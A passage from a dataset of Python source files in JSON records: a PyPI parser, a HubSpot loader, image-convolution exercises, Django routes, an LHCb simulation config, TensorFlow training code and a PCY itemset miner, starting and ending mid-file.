', summary, flags=re.MULTILINE | re.UNICODE))\n #abstract_lines.append('Downloads in the last month: %s' % package_info['downloads']['last_month'])\n\n for classifier in package_info['classifiers']:\n if classifier.startswith('Development Status'):\n abstract_lines.append('Development status: %s' % classifier.split(' - ')[-1])\n break\n\n abstract_lines.append(\"
pip install \" + package_info['name'] + \"
\")\n\n official_site = ''\n # check for real links. We can get stuff like 'unknown', '404' in here\n if package_info['home_page'] and re.search(r'www.', package_info['home_page']):\n official_site = '[' + package_info['home_page'] + ' Official site]\\\\\\\\n'\n\n out_file.write('\\t'.join([\n package_info['name'], # Title\n 'A', # Article type\n '', # No redirect\n '', # Other uses (ignored)\n '', # No categories\n '', # References (ignored)\n '', # No related topics\n '', # Further reading (ignored)\n official_site, # External links (ignored)\n '', # Disambiguation (ignored)\n '', # No images\n '
'.join(abstract_lines),\n urllib.quote(package_info['package_url'], safe='/:'), # Source url\n ]))\n out_file.write('\\n')\n","sub_path":"lib/fathead/py_pi/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"84109565","text":"import matplotlib.pyplot as plt\n\n\ndef add_labels(x, y, labels, ax=None):\n \"\"\"Ajoute les étiquettes `labels` aux endroits définis par `x` et `y`.\"\"\"\n\n if ax is None:\n ax = plt.gca()\n for x, y, label in zip(x, y, labels):\n ax.annotate(\n label, [x, y], xytext=(10, -5), textcoords=\"offset points\",\n )\n\n return ax\n","sub_path":"td/TP03_Representation_euclidienne_des_donnees-corrige/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"149599596","text":"import json\nfrom time import time, sleep\n\nimport aiohttp\nimport asyncio\nimport requests as rq\nfrom dotmap import DotMap\n\nfrom utils.helperutils import HelperUtils\nfrom utils.networkutils import NetworkUtils\n\n\nclass HubspotLoader:\n def __init__(self):\n utils = HelperUtils()\n self.networkutils = NetworkUtils()\n self.hubspot_config = utils.get_hubspot_config()\n self.auth_token = utils.get_hubspot_token()\n self.host = f\"{self.hubspot_config['host']}\"\n self.endpoint = f\"{self.hubspot_config['contact_deals_endpoint']}\"\n self.association = f\"{self.hubspot_config['association']}\"\n self.limit = f\"{self.hubspot_config['limit']}\"\n self.company_deals_urls = []\n self.requests_per_second = self.hubspot_config['requests_per_second']\n\n def add_company_deals_urls(self, company_id, properties):\n query_params = [\n f\"includeAssociations={self.association}\",\n f\"properties={properties}\",\n f\"limit={self.limit}\",\n f\"hapikey={self.auth_token}\"\n ]\n request_url = f\"{self.host}{self.endpoint}/{company_id}/paged?{'&'.join(query_params)}\"\n\n self.company_deals_urls.append(request_url)\n\n def get_company_deals_async(self):\n return self.networkutils.get_response(self.company_deals_urls, self.requests_per_second)\n\n def get_company_deals(self, request_url):\n response = rq.get(request_url)\n response_body = DotMap(json.loads(response.text))\n return response_body.deals\n\n def get_company_deal_urls(self):\n return self.company_deals_urls\n","sub_path":"hubspot/hubspot_loader.py","file_name":"hubspot_loader.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"7658252","text":"import matplotlib\nimport numpy as np\nfrom scipy import ndimage\nmatplotlib.use('TkAgg')\n\nimport matplotlib.pyplot as plt\n\nimport imageio\n\n\nnp.set_printoptions(precision=1,linewidth=5000)\n\n\n\ndef get_simple_images(choix):\n\n img1=None\n img2=None\n if choix==0:\n img1=ndimage.imread(\"image/gamma_fin1.gif\")[:,:,0]\n img2 = ndimage.imread(\"image/gamma_fin1.gif\")[:,:,0]\n elif choix == 1:\n img1 = ndimage.imread(\"image/gamma_grand.gif\")[:, :, 0]\n img2 = ndimage.imread(\"image/gamma_petit.gif\")[:, :, 0]\n elif choix==2:\n img1 = ndimage.imread(\"image/grand_triangle.gif\")[:, :, 0]\n img2 = ndimage.imread(\"image/petit_triangle.gif\")[:, :, 0]\n elif choix==3:\n img1 = np.ones((3,3))\n img2= np.ones((2,2))\n\n elif choix==4:\n img1 = ndimage.imread(\"image/king.gif\")[:, :, 0]\n img2 = ndimage.imread(\"image/translated.gif\")[:, :, 0]\n \"\"\"que fait-t-on subir à nos images ci-dessous ? \"\"\"\n img1 = 255 - img1 # type:np.ndarray\n img2 = 255 - img2 # type:np.ndarray\n\n elif choix == 5: #idem qu'avant, mais en inversant l'ordre des images\n img1 = ndimage.imread(\"image/translated.gif\")[:, :, 0]\n img2 = ndimage.imread(\"image/king.gif\")[:, :, 0]\n \"\"\"que fait-t-on subir à nos images ci-dessous ? \"\"\"\n img1 = 255 - img1 # type:np.ndarray\n img2 = 255 - img2 # type:np.ndarray\n\n\n elif choix == 6:\n img1 = ndimage.imread(\"image/lena/lena_256_NB.png\")\n img2 = ndimage.imread(\"image/lena/translation1.png\")[:,:,0]\n\n print( img1.shape)\n print(img2.shape)\n\n\n elif choix == 7:\n img1 = ndimage.imread(\"image/lena/translation1.png\")\n img2 = ndimage.imread(\"image/lena/translation1.png\")[:, :, 0]\n\n print(img1.shape)\n print(img2.shape)\n\n\n\n return img1.astype(np.float32),img2.astype(np.float32)\n\n\n\ndef step0():\n img1,img2=get_simple_images(3)\n plt.subplot(1,2,1)\n plt.imshow(img1)\n plt.subplot(1,2,2)\n plt.imshow(img2)\n plt.show()\n\n\n\ndef wrapping_shape(img1:np.ndarray, img2:np.ndarray):\n if len(img1.shape) != 2 or len(img1.shape) != 2: raise ValueError(\"args must be matrix\")\n shape1 = np.array(img1.shape)\n shape2 = np.array(img2.shape)\n return np.maximum(shape1, shape2)\n\n\ndef enlargeImage(img:np.ndarray,enlargedShape)->np.ndarray:\n if len(img.shape)!=2 : raise ValueError(\"args must be matrix\")\n if img.shape[0]>enlargedShape[0] or img.shape[1]>enlargedShape[1]: raise ValueError(\"enlargedShape must be larger that the shape of the image to enlarge\")\n res=np.zeros(enlargedShape)\n res[:img.shape[0],:img.shape[1]]=img\n return res\n\n\ndef shiftAndEnlargeImage(img:np.ndarray, shift, enlargedShape=None)->np.ndarray:\n if enlargedShape is None : enlargedShape=(img.shape[0]+shift[0],img.shape[1]+shift[1])\n res=np.zeros(enlargedShape)\n res[shift[0]:img.shape[0]+shift[0],shift[1]:img.shape[1]+shift[1]]=img\n return res\n\n\n\n\ndef step1():\n img1,img2=get_simple_images(0)\n wrap=wrapping_shape(img1,img2)\n\n plt.subplot(2,2,1)\n plt.title('Enlarge')\n plt.imshow(enlargeImage(img1, wrap),vmin=100, vmax=150)\n plt.subplot(2,2,2)\n plt.title('Wrap*2')\n im=enlargeImage(img1,wrap * 2)\n plt.imshow(im,vmin=100, vmax=150)\n plt.subplot(2, 2, 3)\n plt.title('ShEn 2020')\n plt.imshow(shiftAndEnlargeImage(img1, (20, 20)),vmin=100, vmax=150)\n plt.subplot(2, 2, 4)\n plt.title('ShEn 3010')\n plt.imshow(shiftAndEnlargeImage(img1, (30, 10), enlargedShape=wrap * 2),vmin=100, vmax=150)\n plt.show()\n\n\"\"\"\nQuelle critique peut-on faire des sorties précédentes ?\nAméliorez-les en précisant l'échelle des couleurs :\n plt.imshow(img,vmin=..., vmax=...)\n\"\"\"\n\n\n\n\"\"\"the convolution of the two images, with shape: max(img1.shape[0],img2.shape[0]), max(img1.shape[1],img2.shape[1])\"\"\"\ndef convolution_rapide_2d(img1:np.ndarray, img2:np.ndarray,isCircular:bool,isAnti:bool)->np.ndarray:\n\n wrap_shape=wrapping_shape(img1,img2)\n if not isCircular: wrap_shape*=2\n\n img1=enlargeImage(img1, wrap_shape)\n img2=enlargeImage(img2, wrap_shape)\n\n if isAnti:img1=img1[::-1,::-1]\n\n fft1=np.fft.fft2(img1)\n fft2=np.fft.fft2(img2)\n preRes=np.real(np.fft.ifft2(fft1*fft2))\n\n if isAnti :return preRes[::-1,::-1]\n else : return preRes\n\n\n\n\n\"\"\" Pour tester, attention, elle ne calcule que les décalages positifs\"\"\"\ndef anti_convolution_lente2D(img1, img2):\n\n res=np.zeros(img1.shape)\n for x in range(0,img1.shape[0]):\n for y in range(0, img1.shape[1]):\n shift2=shiftAndEnlargeImage(img2, (x, y))\n wrap=wrapping_shape(img1,shift2)\n res[x,y]=np.sum(enlargeImage(img1,wrap)*enlargeImage(shift2,wrap))\n\n return res\n\n\n\ndef step3():\n img1, img2 = get_simple_images(1)\n print(\"lente\\n\",np.round(anti_convolution_lente2D(img1, img2),1))\n print(\"rapide\\n\",np.round( convolution_rapide_2d(img1, img2,False,True),1))\n\n\n\n\"\"\" comparons les différents type de convolutions.\nEssayez d'interprétez les résultats. Les convolutions de \"gamma\" sont les plus faciles à interpréter à mon avis \"\"\"\ndef step4():\n \"\"\"\"\"\"\n \"\"\"avec 0, c'est les gamma fin\"\"\"\n img1, img2 = get_simple_images(7)\n plt.subplot(3, 2, 1)\n plt.imshow(img1)\n plt.title(\"img1\")\n plt.subplot(3, 2, 2)\n plt.imshow(img2)\n plt.title(\"img2\")\n plt.subplot(3, 2, 3)\n plt.imshow(convolution_rapide_2d(img1, img2,False,False))\n plt.title(\"convolution\")\n plt.subplot(3, 2, 4)\n plt.imshow(convolution_rapide_2d(img1, img2,True,False))\n plt.title(\"convolution circulaire\")\n plt.subplot(3, 2, 5)\n plt.imshow(convolution_rapide_2d(img1, img2,False,True))\n plt.title(\"anti-convolution\")\n plt.subplot(3, 2, 6)\n plt.imshow(convolution_rapide_2d(img1, img2,True,True ))\n plt.title(\"anti-convolution circulaire\")\n plt.legend()\n plt.show()\n\n\n\n\ndef step5():\n\n img1, img2 = get_simple_images(2) #ça va planter avec le choix 4 notamment\n anti=convolution_rapide_2d(img1, img2,False,True)\n\n\n wrap=wrapping_shape(img1,img2)\n\n print(wrap*2,np.prod(wrap*2),np.argmax(anti))\n\n shift= list(np.unravel_index(np.argmax(anti),wrap*2)) #le list: pour le warning\n\n somme=enlargeImage(img1,wrap*2)+shiftAndEnlargeImage(img2,shift,wrap*2)\n plt.subplot(131)\n plt.imshow(img1)\n plt.subplot(132)\n plt.imshow(img2)\n plt.subplot(133)\n plt.imshow(somme)\n plt.show()\n\n\n\"\"\"\ntravail :\n\nModifiez le dernier step pour qu'il puisse caller 2 images quelque soit leur position relative.\nnotamment\n img1, img2 = getImages(4)\ndevrait fonctionner.\nAttention, il y a 4 sortes de décalages possibles (2 décalages possibles pour les abscisses, 2 décalages possibles pour les ordonnées).\nVous trouverez peut-être un moyen astucieux pour traiter les 4 cas d'un seul coup. Sinon traitez les 4 cas.\n\n\"\"\"\n\n\nif __name__==\"__main__\":\n step1()\n","sub_path":"Signals/tp11/C_decal2d.py","file_name":"C_decal2d.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"647611313","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = \"inscription\"\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^merci/$', views.ContactMerciView.as_view(), name=\"contact_merci\"),\n url(r'^inscription/$', views.inscription, name=\"inscription\"),\n url(r'^inscription/attente$', views.InscriptionAttenteView.as_view(), name=\"inscription_attente\"),\n url(r'^inscription/annulation$', views.InscriptionAnnulationView.as_view(), name=\"inscription_annulation\"),\n url(r'^inscription/decharge$', views.InscriptionDechargeView.as_view(), name=\"inscription_decharge\"),\n url(r'^inscription/paiement$', views.InscriptionPaiementView.as_view(), name=\"inscription_paiement\"),\n url(r'^inscription/merci$', views.InscriptionMerciView.as_view(), name=\"inscription_merci\"),\n #pour la verification de Google Search Console (webmaster tools)\n url(r'^google64b73e3e98e79ca8.html$', views.GoogleSearchConsoleView.as_view(), name=\"google_verification\"),\n\n]","sub_path":"inscription/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"574732564","text":"from os import environ\nfrom GaudiKernel.SystemOfUnits import *\nfrom Gaudi.Configuration import *\nfrom Configurables import GaudiSequencer, CombineParticles\nfrom Configurables import DecayTreeTuple, EventTuple, TupleToolTrigger, TupleToolTISTOS,FilterDesktop, MCDecayTreeTuple,PrintMCTree\nfrom Configurables import BackgroundCategory, TupleToolDecay, TupleToolVtxIsoln,TupleToolPid,EventCountHisto,TupleToolRecoStats\nfrom Configurables import LoKi__Hybrid__TupleTool, TupleToolVeto\n# Unit\nSeqPhys = GaudiSequencer(\"SeqPhys\")\n\nmct = MCDecayTreeTuple('mct')\nmct.Decay = \"gamma\"\nmct.Branches = {\n \"gamma\" :\"gamma\" ,\n\t}\nmctB = MCDecayTreeTuple('mctB')\nmctB.Decay = \"[B0]CC\"\nmctB.Branches = {\n \"B0\" :\"[B0]CC\" ,\n }\n#mct = MCDecayTreeTuple('mct')\n#mct.Decay = \"[Lambda_c+ => ^p+ ^K- ^pi+]CC\"\n#mct.Branches = {\n# \"Lc\" :\"[Lambda_c+ => p+ K- pi+ ]CC\" ,\n# \"Lcp\":\"[Lambda_c+ => ^p+ K- pi+]CC\" ,\n# \"LcK\":\"[Lambda_c+ => p+ ^K- pi+]CC\" ,\n# \"LcH\":\"[Lambda_c+ => p+ K- ^pi+]CC\" ,\n# }\n#mct = MCDecayTreeTuple('mct')\n#mct.Decay = \"[D0 => ^K- ^pi+]CC\"\n#mct.Branches = {\n# \"Lc\" :\"[D0 => K- pi+]CC\" ,\n# \"LcK\":\"[D0 => ^K- pi+]CC\" ,\n# \"LcH\":\"[D0 => K- ^pi+]CC\" ,\n# }\ndef doIt():\n \"\"\"\n specific post-config action for (x)GEN-files \n \"\"\"\n extension = \"xgen\"\n ext = extension.upper()\n\n from Configurables import DataOnDemandSvc\n dod = DataOnDemandSvc ()\n from copy import deepcopy \n algs = deepcopy ( dod.AlgMap ) \n bad = set() \n for key in algs :\n if 0 <= key.find ( 'Rec' ) : bad.add ( key )\n elif 0 <= key.find ( 'Raw' ) : bad.add ( key )\n elif 0 <= key.find ( 'DAQ' ) : bad.add ( key )\n elif 0 <= key.find ( 'Trigger' ) : bad.add ( key )\n elif 0 <= key.find ( 'Phys' ) : bad.add ( key )\n elif 0 <= key.find ( 'Prev/' ) : bad.add ( key )\n elif 0 <= key.find ( 'Next/' ) : bad.add ( key )\n elif 0 <= key.find ( '/MC/' ) and 'GEN' == ext : bad.add ( key )\n for b in bad :\n del algs[b]\n\n dod.AlgMap = algs\n\n from Configurables import EventClockSvc, CondDB \n EventClockSvc ( EventTimeDecoder = \"FakeEventTime\" )\n CondDB ( IgnoreHeartBeat = True )\n\nappendPostConfigAction( doIt)\nmctl=[ 'MCTupleToolHierarchy', 'MCTupleToolKinematic', 'MCTupleToolPrimaries']\nmctl=[ 'MCTupleToolKinematic']\nmct.ToolList=mctl \nmctB.ToolList=mctl \n\nprintMC = PrintMCTree()\nprintMC.ParticleNames = [\"Lambda_c+\",\"Lambda_c~-\"]\nprintMC.ParticleNames = [\"D0\",\"D~0\"]\nprintMC.ParticleNames = [\"Xi_cc++\",\"Xi_cc~--\"]\nprintMC.ParticleNames = [\"B0\",\"B~0\"]\nprintMC.ParticleNames = [\"B+\",\"B-\"]\n\n\n\n\n########################################################################\nfrom Configurables import DaVinci\nDaVinci().EvtMax = -1\n#DaVinci().PrintFreq = 1\n#DaVinci().SkipEvents = 4 # Events to skip\nDaVinci().DataType = \"2018\"\nDaVinci().Simulation = True\n#DaVinci().DDDBtag =\"dddb-20150703\"\n#DaVinci().CondDBtag = \"sim-20150703-vc-md100\"\nname = \"B2KstGamma\"\nDaVinci().TupleFile = name+\"_Truth.root\" # Ntuple\n#DaVinci().UserAlgorithms = [printMC] \nDaVinci().UserAlgorithms = [mct,mctB] \n#DaVinci().Input=[\"Gauss-26166050-100ev-20170208.xgen\"]\n#DaVinci().Input=[\"Lc.xgen\"]\nDaVinci().Input=[name+\".sim\"]\n#DaVinci().Input=[\"B2Kee.sim\"]\n#DaVinci().Input=[\"D0.xgen\"]\n","sub_path":"LHCbGaussSimulation_Option/pgun/ReadSim.py","file_name":"ReadSim.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"124629299","text":"#bu algoritma direk neredeyse tüm doğal sayıları deniyor. kesin daha etkili bir algoritma vardır.\n#x,y,z tarzında üçlü mesela 3 4 5\n#primitive right triangle demek sayılar aralarında asal demek. mesela 6 8 10 ve 3 4 5 aynanda varolmuyor.\nimport math\nimport time\n\nwhile True:\n n=int(input(\"Dik kenarların en büyük değerini giriniz: \"))\n baslama_zamani= time.time()\n liste=[f\"{x} {y} {int(math.sqrt(x**2 + y**2))}\\n\"\n for x in range(2,n) for y in range(x+1,n) \n if math.isclose(math.sqrt(x**2 + y**2),int(math.sqrt(x**2 + y**2))) and math.gcd(x,y)==1]\n\n yeni_liste =\"\".join(liste)\n print(f\"{yeni_liste}\\n{round(time.time() - baslama_zamani,5)} saniyede {len(liste)} ilkel Pisagor üçgeni bulundu.\\n\")\n\n","sub_path":"pisagor_uclusu_bulucu.py","file_name":"pisagor_uclusu_bulucu.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"61091767","text":"# CNN + RNN on 20 images\nimport tensorflow as tf\nimport random\nimport numpy as np\nimport random\n\n# hyper parameters\nlearning_rate = 0.0001\ntraining_epochs = 200\nbatch_size = 100\nfinal_output = 7\ndropout_rate = 0.7 # keep_prob.\n\n# parameters for rnn\ntime_step_size = 20 # which is the number of frames\nlstm_size = 3072\n\ntf.set_random_seed(777) # reproducibility\n\ndata_all = np.loadtxt('image_recognition_data.csv', delimiter=',', dtype=np.float32)\ndata = data_all[:5000]\ndata_test = data_all[5000:]\n\n\ndef next_batch(step):\n if ((step + 1) * batch_size > len(data)):\n data_piece = data[step * batch_size:]\n else:\n data_piece = data[step * batch_size:(step + 1) * batch_size]\n Ys_raw = data_piece[:, [-1]]\n Ys = []\n for i in range(len(Ys_raw)):\n entry = [0] * 7\n for result in range(7):\n if (Ys_raw[i][0] == result):\n entry[result] = 1\n else:\n entry[result] = 0\n Ys.append(entry)\n\n return data_piece[:, :-1], Ys\n\ndef test_set() :\n size = np.shape(data_test)[0]\n temp_test = np.asarray([data_test[random.randint(0,size-1)]])\n for i in range(99) :\n temp_test = np.concatenate((temp_test, [data_test[random.randint(0,size-1)]]), axis = 0)\n Ys_raw = temp_test[:, [-1]]\n Ys = []\n for i in range(len(Ys_raw)):\n entry = [0] * 7\n for result in range(7):\n if (Ys_raw[i][0] == result):\n entry[result] = 1\n else:\n entry[result] = 0\n Ys.append(entry)\n return temp_test[:, :-1], Ys\n \n\n\n# < Input Process >\n# X : [batch_size, 20 * 48 * 48 * 1]\n# (processed) --> X_images : [20, batch_size, 48, 48, 1]\n# Y : [batch_size, 7]`\nX = tf.placeholder(tf.float32, [None, 20 * 48 * 48 * 1])\nX_reshaped = tf.reshape(X, [-1, 20, 48, 48, 1]) # img 48*48*1 (gray)\nX_images = []\nfor i in range(20):\n temp = tf.slice(X_reshaped, [0, i, 0, 0, 0], [-1, 1, -1, -1, -1])\n X_images.append(tf.reshape(temp, [-1, 48, 48, 1]))\nY = tf.placeholder(tf.float32, [None, 7])\n\n\n\n# < Convolution + MaxPool 1 : Layer1 >\n# (+) Conv1 : [?, 48, 48, 1] --> [?, 44, 44, 64]\n# (+) MaxPool1 : [?, 44, 44, 64] --> [?, 22, 22, 64]\n# X_images_after_L1 : [20, ?, 22, 22, 64]\n#W1 = tf.get_variable(\"W1\", shape=[5, 5, 1, 64],\n# initializer=tf.contrib.layers.xavier_initializer())\nW1 = tf.Variable(tf.random_normal([5,5,1,64]))\nX_images_after_L1 = [0]*20\nfor i in range(20):\n temp = tf.nn.conv2d(X_images[i], W1, strides=[1, 1, 1, 1], padding='VALID')\n temp = tf.nn.relu(temp)\n temp = tf.nn.max_pool(temp, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')\n temp = tf.nn.dropout(temp, dropout_rate)\n X_images_after_L1[i] = temp\n\n\n\n# < Convolution + MaxPool 2 : Layer2 >\n# (+) Conv2 : [?, 22, 22, 64] --> [?, 18, 18, 64]\n# (+) MaxPool2 : [?, 18, 18, 64] --> [?, 9, 9, 64]\n# X_images_after_L2 : [20, ?, 9, 9, 64]\n#W2 = tf.get_variable(\"W2\", shape=[5, 5, 64, 64],\n# initializer=tf.contrib.layers.xavier_initializer())\nW2 = tf.Variable(tf.random_normal([5,5,64,64]))\nX_images_after_L2 = [0]*20\nfor i in range(20):\n temp = tf.nn.conv2d(X_images_after_L1[i], W2, strides=[1, 1, 1, 1], padding='VALID')\n temp = tf.nn.relu(temp)\n temp = tf.nn.max_pool(temp, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')\n temp = tf.nn.dropout(temp, dropout_rate)\n X_images_after_L2[i] = temp\n\n\n\n# < Convolution (No MaxPool) : Layer3 >\n# (+) Conv3 : [?, 9, 9, 64] --> [?, 6, 6, 128]\n# X_images_after_L3 : [20, ?, 6 * 6 * 64] (flattened for layer4 (which is fully connected layer)\n#W3 = tf.get_variable(\"W3\", shape=[4, 4, 64, 128],\n# initializer=tf.contrib.layers.xavier_initializer())\nW3 = tf.Variable(tf.random_normal([4,4,64,128]))\nX_images_after_L3 = [0]*20\nfor i in range(20):\n temp = tf.nn.conv2d(X_images_after_L2[i], W3, strides=[1, 1, 1, 1], padding='VALID')\n temp = tf.nn.relu(temp)\n temp = tf.nn.dropout(temp, dropout_rate)\n temp = tf.reshape(temp, [-1, 6 * 6 * 128])\n X_images_after_L3[i] = temp\n\n\n\n# < Fully Connected to 3072 nodes : Layer4 >\n# X_images_after_L4 : [?, 20, 3072]\n#W4 = tf.get_variable(\"W4\", shape=[6 * 6 * 128, 3072],\n# initializer=tf.contrib.layers.xavier_initializer())\nW4 = tf.Variable(tf.random_normal([6*6*128, 3072]))\n#b4 = tf.get_variable(\"b4\", shape=[3072],\n# initializer=tf.contrib.layers.xavier_initializer())\nb4 = tf.Variable(tf.random_normal([3072]))\nX_images_after_L4 = tf.reshape(tf.matmul(X_images_after_L3[0], W4) + b4, [-1, 1, 3072])\nfor i in range(1, 20, 1):\n temp = tf.reshape(tf.matmul(X_images_after_L3[i], W4) + b4, [-1, 1, 3072])\n temp = tf.nn.dropout(temp, dropout_rate)\n X_images_after_L4 = tf.concat([X_images_after_L4, temp], 1)\n \n\n\n# < RNN on features-extracted images : Layer5 >\n# logits : [?, 3072]\n\n#W5 = tf.get_variable(\"W5\", shape=[20*3072, 7],\n# initializer=tf.contrib.layers.xavier_initializer())\nW5 = tf.Variable(tf.random_normal([20*3072, 7]))\n#b5 = tf.get_variable(\"b5\", shape=[7],\n# initializer=tf.contrib.layers.xavier_initializer())\n # X, input shape: (?, 20, 3072)\nb5 = tf.Variable(tf.random_normal([7]))\nXT = tf.transpose(X_images_after_L4, [1, 0, 2]) # permute time_step_size and batch_size\n # XT shape: (20, ?, 3072)\nXR = tf.reshape(XT, [-1, lstm_size]) # each row has input for each lstm cell (lstm_size=input_vec_size)\n # XR shape: (time_step_size * batch_size, input_vec_size)\nX_split = tf.split(XR, time_step_size, 0)\n # Each array shape: (?, 3072)\n # Make lstm with lstm_size\n\n\nlstm = tf.contrib.rnn.BasicLSTMCell(lstm_size, forget_bias=1.0, state_is_tuple=True)\n # Get lstm cell output, 20 arrays with lstm_size output: (?, 3072)\noutputs, _states = tf.nn.static_rnn(lstm, X_split, dtype=tf.float32)\n # Linear activation\n # Get the last output\n\noutputs_reshaped = tf.reshape(outputs[0], [-1, 1, 3072])\nfor i in range(1,20,1) :\n outputs_reshaped = tf.concat([outputs_reshaped, tf.reshape(outputs[i], [-1, 1, 3072])], 1)\n\noutputs_reshaped = tf.nn.dropout(outputs_reshaped, dropout_rate)\n\nlogits, _state = tf.matmul(tf.reshape(outputs_reshaped, [-1, 20*3072]), W5) + b5, lstm.state_size # State size to initialize the stat\n\n# hypothesis used for later measurement of accuracy\nhypothesis = tf.nn.softmax(logits)\n\n\n# define cost/loss & optimizer\nprint(\"logits : \", logits)\nprint(\"Y : \", Y)\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\nsaver = tf.train.Saver()\n\n\n# initialize\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n\n# train my model\nprint('Learning started. It takes sometime.')\n\nfor epoch in range(training_epochs):\n avg_cost = 0\n total_batch = (int)(np.ceil(float(len(data)) / batch_size))\n\n for step in range(total_batch):\n feed_X, feed_Y = next_batch(step)\n feed_dict = {X: feed_X, Y: feed_Y}\n c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)\n avg_cost += c / total_batch\n\n feed_X_test, feed_Y_test = test_set()\n acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1)), tf.float32))\n \n a = sess.run(acc, feed_dict = {X: feed_X_test, Y: feed_Y_test})\n\n print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))\n print('Accuracy: ', a)\n\nsave_path = saver.save(sess, \"./version_5.ckpt\")\n\nprint('Learning Finished!')\n","sub_path":"Train_CNN+RNN_V6.py","file_name":"Train_CNN+RNN_V6.py","file_ext":"py","file_size_in_byte":7525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"648859013","text":"__author__ = 'Aaron Yang'\n__email__ = 'byang971@usc.edu'\n__date__ = '2/10/2020 10:05 PM'\n\nimport collections\nimport copy\nimport math\nimport sys\nimport time\nfrom functools import reduce\nfrom itertools import combinations\nfrom operator import add\n\nfrom pyspark import SparkContext\n\n# TODO change the number of bucket will have different result\nBUCKET_NUMBER = 99\n\n\ndef hash_func(combination):\n result = sum(map(lambda x: int(x), list(combination)))\n return result % BUCKET_NUMBER\n\n\ndef check_proper_subset(combination, candidate_list):\n \"\"\"\n check if this combination's proper subset in candidate_list\n :param combination: assume its shape is n\n :param candidate_list: then item's shape in this list need to be n - 1\n :return: True of False\n \"\"\"\n length = len(combination)\n for item in combinations(combination, length - 1):\n if len(item) == 1: item = item[0]\n if item not in candidate_list:\n return False\n return True\n\n\ndef check_bitmap(combination, bitmap):\n \"\"\"\n check if its hash result in bitmap\n :param combination:\n :param bitmap:\n :return:\n \"\"\"\n return bitmap[hash_func(combination)]\n\n\ndef wrapper(singleton_list):\n \"\"\"\n reformat str item into tuple\n :param singleton_list:\n :return:\n \"\"\"\n return [tuple(item.split(\",\")) for item in singleton_list]\n\n\ndef shrink_basket(basket, frequent_singleton):\n \"\"\"\n we dont need to compute basket_item which is not frequent_single,\n basically we can return the interaction about this two set\n :param basket:\n :param frequent_singleton:\n :return:\n \"\"\"\n return sorted(list(set(basket).intersection(set(frequent_singleton))))\n\n\ndef find_candidate_itemset(data_baskets, original_support, whole_length):\n \"\"\"\n using PCY to find frequent itemset from subset basket\n :param data_baskets: subset baskets\n :param original_support:\n :param whole_length:\n :return: all candidate itemsets list\n \"\"\"\n\n # compute support threshold in subset baskets\n support, data_baskets = gen_ps_threshold(data_baskets, original_support, whole_length)\n baskets_list = list(data_baskets)\n # print(\"baskets_list -> \", baskets_list)\n all_candidate_dict = collections.defaultdict(list)\n # first phrase of PCY algorithm, acquiring frequent_singleton and bitmap\n frequent_singleton, bitmap = init_singleton_and_bitmap(baskets_list, support)\n index = 1\n candidate_list = frequent_singleton\n all_candidate_dict[str(index)] = wrapper(frequent_singleton)\n\n # the second phrase, third phrase .... until the candidate list is empty\n while None is not candidate_list and len(candidate_list) > 0:\n index += 1\n temp_counter = collections.defaultdict(list)\n temp_bitmap = [0 for _ in range(BUCKET_NUMBER)]\n for basket in baskets_list:\n # we dont need to compute basket_item which is not frequent_single\n basket = shrink_basket(basket, frequent_singleton)\n if len(basket) >= index:\n for pair in combinations(basket, index):\n if check_bitmap(pair, bitmap) and \\\n check_proper_subset(pair, candidate_list):\n temp_counter[pair].append(1)\n\n for triplet in combinations(basket, index + 1):\n key = hash_func(triplet)\n temp_bitmap[key] = (temp_bitmap[key] + 1)\n\n # filter the temp_counter\n filtered_dict = dict(filter(lambda elem: len(elem[1]) >= support, temp_counter.items()))\n print(\"index ->\", index)\n print(\"filtered_dict -> \", filtered_dict)\n # generate new candidate list\n candidate_list = sorted(list(filtered_dict.keys()))\n if len(candidate_list) == 0:\n break\n all_candidate_dict[str(index)] = candidate_list\n # generate new bitmap\n bitmap = list(map(lambda value: True if value >= support else False, temp_bitmap))\n\n # convert 2d-array into 1d array\n yield reduce(lambda val1, val2: val1 + val2, all_candidate_dict.values())\n\n\ndef init_singleton_and_bitmap(baskets, support):\n \"\"\"\n first phrase of PCY algorithm\n :param baskets:\n :param support:\n :return: frequent_singleton: a list of sorted frequent singleton => ['100', '101', '102'...\n bitmap: a boolean list => [True, False, True ...\n \"\"\"\n bitmap = [0 for _ in range(BUCKET_NUMBER)]\n temp_counter = collections.defaultdict(list)\n for basket in baskets:\n # find frequent singleton\n for item in basket:\n temp_counter[item].append(1)\n\n # find frequent bucket\n for pair in combinations(basket, 2):\n key = hash_func(pair)\n bitmap[key] = (bitmap[key] + 1)\n\n filtered_dict = dict(filter(lambda elem: len(elem[1]) >= support, temp_counter.items()))\n frequent_singleton = sorted(list(filtered_dict.keys()))\n bitmap = list(map(lambda value: True if value >= support else False, bitmap))\n\n return frequent_singleton, bitmap\n\n\ndef 